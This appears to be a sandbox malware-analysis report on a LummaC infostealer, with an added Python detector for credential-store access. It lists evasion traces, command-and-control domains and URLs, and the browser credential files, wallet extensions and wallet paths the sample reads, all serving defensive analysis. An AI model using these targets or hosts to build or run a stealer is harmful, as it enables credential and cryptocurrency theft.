              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 56409B5 second address: 5640A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 mov cx, 3191h 0x0000000c pushad 0x0000000d jmp 00007F7F08F6418Ch 0x00000012 mov esi, 5AA6A101h 0x00000017 popad 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F7F08F6418Ch 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 mov ax, BEADh 0x00000026 movzx ecx, dx 0x00000029 popad 0x0000002a cmp dword ptr [75C7459Ch], 05h 0x00000031 jmp 00007F7F08F64195h 0x00000036 je 00007F7F7953217Ch 0x0000003c pushad 0x0000003d call 00007F7F08F6418Ch 0x00000042 pushfd 0x00000043 jmp 00007F7F08F64192h 0x00000048 or ax, 8ED8h 0x0000004d jmp 00007F7F08F6418Bh 0x00000052 popfd 0x00000053 pop ecx 0x00000054 call 00007F7F08F64199h 0x00000059 pop edx 0x0000005a popad 0x0000005b pop ebp 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F7F08F64199h 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640A78 second address: 5640A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E3Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640B12 second address: 5640B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F08F64199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640B2F second address: 5640B35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5640B35 second address: 5640B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650A66 second address: 5650ABC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7F08BA1E49h 0x00000008 adc ax, C886h 0x0000000d jmp 00007F7F08BA1E41h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b mov di, 3F3Ch 0x0000001f call 00007F7F08BA1E45h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650ABC second address: 5650B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F7F08F64193h 0x0000000f or ecx, 6BD29D1Eh 0x00000015 jmp 00007F7F08F64199h 0x0000001a popfd 0x0000001b call 00007F7F08F64190h 0x00000020 jmp 00007F7F08F64192h 0x00000025 pop ecx 0x00000026 popad 0x00000027 push ecx 0x00000028 jmp 00007F7F08F6418Eh 0x0000002d mov dword ptr [esp], esi 0x00000030 jmp 00007F7F08F64190h 0x00000035 mov esi, dword ptr [ebp+0Ch] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650B48 second address: 5650B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650B4C second address: 5650B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650B52 second address: 5650B61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08BA1E3Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650D16 second address: 5650D2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F08F64194h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650D2E second address: 5650D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exeRDTSC instruction interceptor: First address: 5650D32 second address: 5650D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F7F08F64197h 0x0000000e pop ebp 0x0000000f pushad 0x00000010 call 00007F7F08F64194h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Special instruction interceptor: First address: D08A87 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Special instruction interceptor: First address: EAE614 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Special instruction interceptor: First address: D066B6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Special instruction interceptor: First address: D08988 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe TID: 7572  Thread sleep time: -150000s >= -30000s
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe TID: 7572  Thread sleep time: -30000s >= -30000s
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: yO9EAqDV15.exe, 00000000.00000002.2137261398.0000000000E90000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: yO9EAqDV15.exe, 00000000.00000002.2137952740.00000000017A3000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2136686014.00000000017A3000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
              Source: yO9EAqDV15.exe, 00000000.00000002.2137261398.0000000000E90000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: yO9EAqDV15.exe, 00000000.00000002.2137952740.0000000001768000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2136686014.0000000001768000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW`
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  File opened: NTICE
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  File opened: SICE
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  File opened: SIWVID
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Process queried: DebugPort
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Process queried: DebugPort
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: bashfulacid.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: tentabatte.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: curverpluch.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: talkynicer.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: shapestickyr.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: manyrestro.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: slipperyloo.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: wordyfindy.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137187318.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp  String found in binary or memory: observerfry.lat
              Source: yO9EAqDV15.exe, 00000000.00000002.2137261398.0000000000E90000.00000040.00000001.01000000.00000003.sdmp  Binary or memory string: (Program Manager
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: yO9EAqDV15.exe, 00000000.00000003.2126368400.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2136900603.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2080196097.00000000017FA000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000002.2138135257.00000000017FC000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2126187612.00000000017F2000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\yO9EAqDV15.exe  WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: yO9EAqDV15.exe PID: 7412, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Files opened by C:\Users\user\Desktop\yO9EAqDV15.exe, grouped by artefact (order within each group is the report's order):

Chrome profile data (C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\):
  History
  Login Data
  Network\Cookies
  Login Data For Account
  Web Data

Edge profile data (C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\):
  Login Data
  History
  Login Data For Account
  Network\Cookies

Firefox profile data (C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\), plus the profiles directory C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles itself:
  prefs.js
  key4.db
  places.sqlite
  cert9.db
  formhistory.sqlite
  logins.json
  cookies.sqlite

Chrome extension storage (C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\<extension id>), extension ids as listed:
  dngmlblcodfobpdpecaadgfbcggfjfnm
  ffnbelfdoeiohenkjibnmadjiehjhajb
  hpglfhgfnhbgpjdenjgmdgoeiappafln
  nlbmnnijcnlegkjjpcfjclmcfggfefdm
  lgmpcpglpngdoalbgeoldeajfclnhafa
  lpfcbjknijpeeillifnkikgncikgfhdo
  idnnbdplmphpflfnlkomgpfbpcgelopg
  aeblfdkhhhdcdjpifhhbdiojplfjncoa
  egjidjbpglichdcondbcbdnbeeppgdph
  fijngjgcjhjmmpcmkeiomlglpeiijkld
  jojhfeoedkpkglbfimdfabpdfjaoolaf
  jbdaocneiiinmjbjlgalhcelgbejmnid
  ejjladinnckdgjemekebdpeokbikhfci
  mnfifefkajgofkcjkemidiaecocnkjeh
  aeachknmefphepccionboohckonoeemg
  cnmamaachppnkjgnildpdmkaakejnhae
  aflkmfhebedbjioipglgcbcmnbpgliof
  fnjhmkhhmkbjkkabndcnnogagogbneec
  cnncmdhjacpkmjmkcafchppbnpnhdmon
  ejbalbakoplchlghecdalmeeeajnimhm
  lkcjlnjfpbikmcmbachjpdbijejflpcm
  onofpnbbkehpmmoabgpcpmigafmmnjh
  abogmiocnneedmmepnohnhlijcjpcifd
  afbcbjpbpfadlkmhmclhkeeodmamcflc
  mmmjbcfofconkannjonfmjjajpllddbg
  hdokiejnpimakedhajhdlcegeplioahd
  kjmoohlgokccodicjjfebfomlbljgfhk
  bhghoamapcdpbohphigoooaddinpkbai
  hcflpincpppdclinealmandijcmnkbgn
  fihkakfobkmkjojpchpfgcmhfjnmnfpi
  anokgmphncpekkhclmingpimjmcooifb
  efbglgofoippbgcjepnhiblaibcnclgk
  klnaejjgbibmhlephnhpmaofohgkpgkd
  kpfopkelmapcoipemfendmdcghnegimn
  kncchdigobghenbbaddojjnnaogfppfj
  cphhlgmgameodnhkjdmkpanlelnlohao
  nhnkbkgjikgcigadomkphalanndcapjk
  cpojfbodiccabbabgimdeohkkpjfpbnf
  ibnejdfjmmkpcnlpebklmnkoeoihofec
  kppfdiipphfccemcignhifpjkapfbihd
  cihmoadaighcejopammfbmddcmdekcje
  ookjlbkiijinhpmnjffcofjonbfbgaoc
  aholpfdialjgjfhomihkjbmgjidlcdno
  infeboajgfhgbjpjbeppbkgnabfdkdaf
  dkdedlpgdmmkkfjabffeganieamfklkm
  bhhhlbepdkbapadjdnnojkbgioiodbic
  nlgbhdfgdhgbiamfdfmbikcdghidoadd
  heefohaffomkkkphnlpohglngmbcclhi
  dmkamcknogkgcdfhhbddcghachkejeap
  kkpllkodjeloidieedojogacfhpaihoh
  bfnaelmomeimhlpmgjnjophhpkkoljpa
  onhogfjeacnfoofkfgppdlbmlmnplgbn
  hnfanknocfeofbddgcijnmhnfnkdnaad
  pioclpoplcdbaefihamjohnefbikjilc
  mkpegjkblkkefacfnmkajcjmabijhclg
  ocjdpmoallmgmjbbogfiiaofphbjgchh
  loinekcabhlmhjjbocijdoimmejangoa
  nkbihfbeogaeaoehlefnkodbefgpgknn
  mopnmbcafieddcagagdcbnhejhlodfdd
  jiidiaalihmmhddjgbnbgdfflelocpak
  fhbohimaelbohpjbbldcngcnapndodjp
  ppbibelpcjmhbdihakflkdcoccbgbkpo
  aiifbnbfobpmeekipheeijimdpnlpgpp
  nngceckbapebfimnlniiiahkandclblb
  ojggmchlghnjlapmfbnjholfjkiidbch
  ijmpgkjfkbfhoebgogflfebnmejmfbm
  acmacodkjbdgmoleebolmdjonilkdbch
  flpiciilemghbmfalicajoolhkkenfe
  nanjmdknhkinifnkgdcggcfnhdaammmj
  cjelfplplebdjjenllpjcblmjkfcffne
  imloifkgjagghnncjkhggdhalmcnfklk
  jnlgamecbpmbajjfhmmmlhejkemejdma
  opcgpfmipidbgpenhmajoajpbobppdil
  blnieiiffboillknjnepogjhkgnoapac
  fhmfendgdocmcbmfikdcogofphimnkno
  nkddgncdjgjfcddamfgcmfnlhccnimig
  fcfcfllfndlomdhbehjjcoimbgofdncg
  gaedmjdfmmahhbjefcbgaolhhanlaolb
  ilgcnhelpchnceeipipijaljkblbcob
  phkbamefinggmakgklpkljjmgibohnba
  oeljdldpnmdbchonielidgobddfffla
  amkmjjmmflddogmhpjloimipbofnfjih
  mcohilncbfahbmgdjkbpemcciiolgcge
  lodccjjbdhfakaekdiahmedfbieldgik
  nknhiehlklippafakaeklbeglecifhad
  jgaaimajipbpdogpdglhaphldakikgef
  dlcobpjiigpikoobohmabehhmhfoodbb
  bcopgchhojmggmffilplmbdicgaihlkp
  hifafgmccdpekplomjjkcfgodnhcellj

Chrome synced extension storage (C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\<extension id>):
  oeljdldpnmdbchonielidgobddfffla
  ilgcnhelpchnceeipipijaljkblbcob
  bhghoamapcdpbohphigoooaddinpkbai

Desktop wallet data:
  C:\Users\user\AppData\Roaming\Exodus\exodus.wallet (opened twice)
  C:\Users\user\AppData\Roaming\Ledger Live
  C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
  C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets (opened twice)
  C:\Users\user\AppData\Roaming\Bitcoin\wallets
  C:\Users\user\AppData\Roaming\Binance
  C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
  C:\Users\user\AppData\Roaming\Electrum\wallets
  C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
  C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Directories queried by C:\Users\user\Desktop\yO9EAqDV15.exe under C:\Users\user\Documents\ (number of queries in parentheses):
  BNAGMGSPLO (4), MXPXCVPDVN (2), ZGGKNSUKOP (2), ZQIXMVQGAH (2), PALRGUCVEH (2), SFPUSAFIOL (4), UOOJJOZIRH (2), EEGWXUHVUG (2)

Source: Yara match | File source: Process Memory Space: yO9EAqDV15.exe PID: 7412, type: MEMORYSTR
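The file opens listed above are the sample's collection phase and they translate directly into a host-side detection: a process that is not a browser reading browser credential stores, sweeping many Chrome extension storage directories, or touching desktop wallet data. The block below is an added example written for this page; it is not part of the Joe Sandbox report and not LummaC code. The "timestamp|image|path" event layout, the sample events, the browser allowlist and the sweep threshold of five extension stores are all my assumptions; the artefact paths themselves are the ones the report shows.

```python
"""Added example: flag non-browser processes reading browser credential stores,
extension storage and desktop wallet data, using the paths this report shows
the sample opening. The event format and the sample events are constructed."""
import re
from collections import defaultdict

# File names the report shows being opened inside Chrome, Edge and Firefox profiles.
CREDENTIAL_FILES = (
    "\\login data", "\\login data for account", "\\network\\cookies", "\\web data",
    "\\history", "\\key4.db", "\\logins.json", "\\cookies.sqlite",
    "\\places.sqlite", "\\formhistory.sqlite", "\\cert9.db",
)
# Wallet locations the report shows being opened.
WALLET_PATHS = (
    "\\exodus\\exodus.wallet", "\\ledger live", "\\atomic\\local storage\\leveldb",
    "\\coinomi\\coinomi\\wallets", "\\bitcoin\\wallets", "\\roaming\\binance",
    "\\com.liberty.jaxx\\indexeddb", "\\electrum\\wallets", "\\electrum-ltc\\wallets",
    "\\guarda\\indexeddb",
)
# Browsers are expected to read their own profiles; everything else is suspect (assumed allowlist).
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}
# Chrome extension ids are 32 chars of a-p; the report also lists a few 31-char ids.
EXT_STORE_RE = re.compile(r"\\(local|sync) extension settings\\([a-p]{31,32})$", re.I)
EXT_SWEEP_THRESHOLD = 5  # assumed: distinct extension stores per process before alerting


def parse_event(line):
    """Constructed 'timestamp|process image|file path' layout, not a real Sysmon format."""
    ts, image, path = line.strip().split("|", 2)
    return {"ts": int(ts), "image": image, "path": path}


def classify(path):
    """Map a path to the artefact class it belongs to, or None."""
    p = path.lower()
    if EXT_STORE_RE.search(p):
        return "extension_store"
    if any(p.endswith(name) for name in CREDENTIAL_FILES):
        return "browser_credential_store"
    if any(marker in p for marker in WALLET_PATHS):
        return "crypto_wallet"
    return None


def detect(lines):
    """Return (image, category, detail) findings; browsers reading their own data are skipped."""
    findings = []
    ext_stores = defaultdict(set)  # image -> distinct extension ids touched
    for ev in map(parse_event, lines):
        category = classify(ev["path"])
        if category is None:
            continue
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        if exe in BROWSER_IMAGES and category != "crypto_wallet":
            continue
        if category == "extension_store":
            ext_stores[ev["image"]].add(EXT_STORE_RE.search(ev["path"].lower()).group(2))
            continue
        findings.append((ev["image"], category, ev["path"]))
    # One alert per process that swept many extension stores, not one alert per store.
    for image, ids in ext_stores.items():
        if len(ids) >= EXT_SWEEP_THRESHOLD:
            findings.append((image, "extension_store_sweep", f"{len(ids)} extension stores"))
    return findings


# Constructed events mirroring the report's "File opened" entries (ids are from the report).
_CHROME = "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
_SAMPLE = "C:\\Users\\user\\Desktop\\yO9EAqDV15.exe"
_EXT = _CHROME + "\\Local Extension Settings\\"
SAMPLE_EVENTS = [
    f"1|C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|{_CHROME}\\Login Data",
    f"2|{_SAMPLE}|{_CHROME}\\Login Data",
    f"3|{_SAMPLE}|C:\\Users\\user\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\fqs92o4p.default-release\\key4.db",
    f"4|{_SAMPLE}|C:\\Users\\user\\AppData\\Roaming\\Exodus\\exodus.wallet",
    f"5|{_SAMPLE}|{_EXT}nkbihfbeogaeaoehlefnkodbefgpgknn",
    f"6|{_SAMPLE}|{_EXT}bfnaelmomeimhlpmgjnjophhpkkoljpa",
    f"7|{_SAMPLE}|{_EXT}egjidjbpglichdcondbcbdnbeeppgdph",
    f"8|{_SAMPLE}|{_EXT}hnfanknocfeofbddgcijnmhnfnkdnaad",
    f"9|{_SAMPLE}|{_EXT}ibnejdfjmmkpcnlpebklmnkoeoihofec",
    "10|C:\\Windows\\explorer.exe|C:\\Users\\user\\Documents\\notes.txt",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Feeding the constructed events through `detect` yields two credential-store findings, one wallet finding and one extension-store sweep, all attributed to yO9EAqDV15.exe; the browser's own read of Login Data and explorer.exe's read of an ordinary document produce nothing. Real telemetry (Sysmon Event ID 11 does not cover reads, so this needs file-access auditing or an EDR feed) should be mapped into `parse_event` and the browser allowlist extended with any profile-management tooling in use.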

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: yO9EAqDV15.exe PID: 7412, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
ATT&CK matrix, one line per tactic. The number in parentheses is the hit count the report's matrix attaches to a technique; techniques listed without a count are matrix cells with no matching signature in this analysis.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation (12), PowerShell (1), At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (44), Process Injection (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Query Registry (1), Security Software Discovery (851), Virtualization/Sandbox Evasion (44), Process Discovery (2), File and Directory Discovery (1), System Information Discovery (223)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Archive Collected Data (1), Data from Local System (21), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (11), Non-Application Layer Protocol (2), Application Layer Protocol (113), Protocol Impersonation, Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Source | Detection | Scanner | Label
yO9EAqDV15.exe | 58% | ReversingLabs | Win32.Trojan.Symmi
yO9EAqDV15.exe | 50% | Virustotal |
yO9EAqDV15.exe | 100% | Avira | TR/Crypt.XPACK.Gen
yO9EAqDV15.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://observerfry.lat/pi | 0% | Avira URL Cloud | safe
https://observerfry.lat:443/apiexe | 0% | Avira URL Cloud | safe
https://observerfry.lat:443/apiy.exe | 0% | Avira URL Cloud | safe
https://observerfry.lat/apiw | 0% | Avira URL Cloud | safe
https://observerfry.lat/$ | 0% | Avira URL Cloud | safe
https://observerfry.lat/d | 0% | Avira URL Cloud | safe
http://crl.microp; | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
observerfry.lat | 172.67.199.72 | true | false | - | high

Name | Malicious | Antivirus Detection | Reputation
wordyfindy.lat | false | - | high
slipperyloo.lat | false | - | high
curverpluch.lat | false | - | high
tentabatte.lat | false | - | high
https://observerfry.lat/api | false | - | high
manyrestro.lat | false | - | high
shapestickyr.lat | false | - | high
talkynicer.lat | false | - | high
bashfulacid.lat | false | - | high
observerfry.lat | false | - | high

The Malicious and Reputation columns above come only from the antivirus and URL-reputation lookups shown in these tables, none of which flagged the .lat domains; they do not alter the report's LummaC verdict, and the same nine domains appear as strings in the sample's memory in the signature evidence above. Only observerfry.lat resolved (to 172.67.199.72) during this run.
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://observerfry.lat:443/apiy.exe | yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2092860657.0000000001809000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg | yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://observerfry.lat/pi | yO9EAqDV15.exe, 00000000.00000002.2138232883.0000000001810000.00000004.00000020.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.2079708593.0000000001809000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | yO9EAqDV15.exe, 00000000.00000003.2051129366.0000000005F65000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | yO9EAqDV15.exe, 00000000.00000003.1980898634.0000000005FAD000.00000004.00000800.00020000.00000000.sdmp, yO9EAqDV15.exe, 00000000.00000003.1980979059.0000000005FAA000.00000004.00000800.00020000.00000000.sdmp | false | | high
